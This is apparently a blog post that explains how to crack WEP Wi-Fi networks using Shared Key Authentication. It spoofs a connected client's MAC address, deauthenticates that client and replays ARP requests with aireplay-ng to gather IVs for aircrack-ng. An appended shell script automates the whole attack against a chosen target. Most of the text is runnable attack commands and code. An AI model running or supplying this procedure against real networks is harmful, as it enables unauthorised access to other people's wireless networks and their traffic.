Access points that use WEP encryption are easy to pwn. Things become a little more complicated when the same APs use Shared Key Authentication (SKA) as the authentication method. The instructions you find on the internet tell you to run airodump-ng and then deauthenticate a connected client from the AP; when the client re-authenticates you are supposed to get a .xor file containing the PRGA keystream needed to continue the attack (for example, using the .xor file to forge an ARP packet with packetforge-ng and injecting it with the interactive packet replay option of aireplay-ng). The problem is that this method, more often than not, does not work, and the only thing you get from airodump-ng is the message Broken SKA in the upper right corner. The reason it fails is that hardware manufacturers modify the 802.11 frame and airodump-ng does not interpret it correctly.
How do we bypass this? One way I found is to use the connected client itself, by spoofing its MAC address, to conduct the attack. We simply change our MAC address to that of the connected client and run an ARP request replay attack. Since the AP keys its authentication and association state on the client's MAC address, frames injected from that address are accepted as coming from the already-authenticated station, so we never have to perform the shared key handshake ourselves. To obtain an ARP packet quickly we deauthenticate the legitimate client from the AP, forcing it to reconnect and generate a new ARP request. The commands you need follow. We assume that the AP is on channel 3 and that the AP and the client have MAC addresses AA:AA:AA:AA:AA:AA and CC:CC:CC:CC:CC:CC respectively.
- create the monitor interface on the correct channel
airmon-ng start wlan0 3
- spoof the mac address of the mon0 interface to reflect the one of the connected client
ifconfig mon0 down
macchanger --mac CC:CC:CC:CC:CC:CC mon0
ifconfig mon0 up
- run airodump to capture packets
airodump-ng --channel 3 -w SKA --bssid AA:AA:AA:AA:AA:AA mon0
- launch the ARP replay attack with aireplay-ng (start it before the deauth so it is already listening when the client's new ARP request appears)
aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
- deauthenticate the connected client to generate an ARP request
aireplay-ng -0 1 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
After this, the #Data counter in airodump-ng starts growing, and the capture collects the IVs you need to crack the WEP key with aircrack-ng.
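The whole procedure above as one script, added here as an example and not part of the original post. It assumes the post's placeholders (channel 3, AP AA:AA:AA:AA:AA:AA, client CC:CC:CC:CC:CC:CC, managed interface wlan0 and monitor interface mon0; newer aircrack-ng releases name the monitor interface wlan0mon instead), all overridable from the environment, and it adds two checks the bare command list lacks: the MAC addresses are validated before use, and after macchanger the script reads the interface address back from the kernel, since the spoof silently fails on some drivers if the interface is still up. DRY_RUN=1 prints the commands instead of running them; the final aircrack-ng invocation targets SKA-01.cap, the file airodump-ng writes for the prefix SKA.

```shell
#!/bin/sh
# Added example: WEP SKA bypass via client MAC spoofing + ARP request replay,
# wrapping the commands from the post. Placeholder values are assumptions.
set -eu

IFACE="${IFACE:-wlan0}"                     # managed interface given to airmon-ng
MON="${MON:-mon0}"                          # monitor interface (wlan0mon on newer airmon-ng)
CHANNEL="${CHANNEL:-3}"
AP_MAC="${AP_MAC:-AA:AA:AA:AA:AA:AA}"       # placeholder from the post
CLIENT_MAC="${CLIENT_MAC:-CC:CC:CC:CC:CC:CC}" # placeholder from the post
PREFIX="${PREFIX:-SKA}"                     # airodump-ng -w prefix -> SKA-01.cap
DRY_RUN="${DRY_RUN:-0}"                     # 1 = print commands instead of running them

# Validate a MAC address and print it in lower-case colon form; status 1 if malformed.
normalize_mac() {
    mac=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    case "$mac" in
        [0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f])
            printf '%s\n' "$mac" ;;
        *)  return 1 ;;
    esac
}

# Run a command, or only echo it when DRY_RUN=1.
run() {
    if [ "$DRY_RUN" = 1 ]; then printf '+ %s\n' "$*"; else "$@"; fi
}

# Spoof the monitor interface MAC and confirm the kernel actually took it.
spoof_mac() {
    run ifconfig "$MON" down
    run macchanger --mac "$CLIENT_MAC" "$MON"
    run ifconfig "$MON" up
    if [ "$DRY_RUN" != 1 ]; then
        now=$(cat "/sys/class/net/$MON/address")
        [ "$now" = "$CLIENT_MAC" ] || { echo "MAC spoof failed: $MON is $now" >&2; return 1; }
    fi
}

main() {
    AP_MAC=$(normalize_mac "$AP_MAC") || { echo "bad AP MAC: $AP_MAC" >&2; exit 1; }
    CLIENT_MAC=$(normalize_mac "$CLIENT_MAC") || { echo "bad client MAC: $CLIENT_MAC" >&2; exit 1; }

    run airmon-ng start "$IFACE" "$CHANNEL"
    spoof_mac
    # airodump-ng and the ARP replay run in the background; the deauth is sent
    # only once both are listening so the client's fresh ARP request is caught.
    run airodump-ng --channel "$CHANNEL" -w "$PREFIX" --bssid "$AP_MAC" "$MON" &
    run sleep 2
    run aireplay-ng -3 -b "$AP_MAC" -h "$CLIENT_MAC" "$MON" &
    run sleep 2
    run aireplay-ng -0 1 -a "$AP_MAC" -c "$CLIENT_MAC" "$MON"
    echo "Watch the #Data column in airodump-ng; once it has grown, crack with:"
    echo "  aircrack-ng ${PREFIX}-01.cap"
}

# Run the attack only when asked explicitly, so the functions can also be sourced.
if [ "${1:-}" = "attack" ]; then
    main
fi
```

Run it as root with `./ska_replay.sh attack` (set AP_MAC, CLIENT_MAC and CHANNEL for the real target first); with `DRY_RUN=1` it only lists the commands it would execute, which is a quick way to check the parameters before touching the radio.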
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.